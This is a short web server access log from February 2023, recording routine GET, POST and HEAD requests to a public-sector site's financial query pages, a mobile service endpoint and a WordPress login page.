186.102.48.15 - - [11/Feb/2023:10:55:14 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19A85WY3dSl1ksAUIqcoUsoCNvJ1enM6bOTHQCdyKKGCyJbFDz9TwbMfM5J5uN1/t/kBbd4lIWo1VVLEeRfp/poTJeLDJvhA8Bm/ARpPsHmfYMZ67NyF47BZGx7/F3olHdVVtQ5UNL5Hunc5123vL/hUGDghKo7OSaVRbg8oJslZ0jSExaNl1slWBGFd2roZ7rSWhl/cmK6QseP8wE7O0KImCfqb/v8ZWHBpinbGed4pAllP2Z1tMDo1Oc59s0dPKy2ZMnkZZq8B+uRYfDFzUxhpO9istFP73cXGKDubstxUOtZecZ2xWo5Cy2pKbVBMOC+0qpDJlL4CQ==&u=U2FsdGVkX18AWKmaEJZogUfE7USLtOFt4Ev+lL4bc2w=&y=U2FsdGVkX1+o0HYRMNK/f2QoHzsyu242mGs/FQj5b9o= HTTP/1.1" 200 196
186.80.234.110 - - [11/Feb/2023:10:55:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 23089
186.102.48.15 - - [11/Feb/2023:10:55:14 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19jRkF4MObMJ/w0lL+RhLZAIqfqMsqGTDGAY9bbqdSLISzzAdFiGL85 HTTP/1.1" 200 31032
186.80.234.110 - - [11/Feb/2023:10:55:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 9861
186.80.234.110 - - [11/Feb/2023:10:55:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 9861
186.80.234.110 - - [11/Feb/2023:10:55:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12856
185.119.81.105 - - [11/Feb/2023:10:55:41 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [11/Feb/2023:10:55:42 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
186.80.234.110 - - [11/Feb/2023:10:55:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 23089
186.80.234.110 - - [11/Feb/2023:10:56:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12969
186.80.234.110 - - [11/Feb/2023:10:56:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 23089
186.80.234.110 - - [11/Feb/2023:10:56:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 13069
66.249.64.47 - - [11/Feb/2023:10:56:47 -0500] "-" 408 -
186.80.234.110 - - [11/Feb/2023:10:56:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 23089
186.80.234.110 - - [11/Feb/2023:10:56:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12794
5.255.231.129 - - [11/Feb/2023:10:57:03 -0500] "-" 408 -
172.22.2.4 - - [11/Feb/2023:10:55:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.80.234.110 - - [11/Feb/2023:10:57:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12794
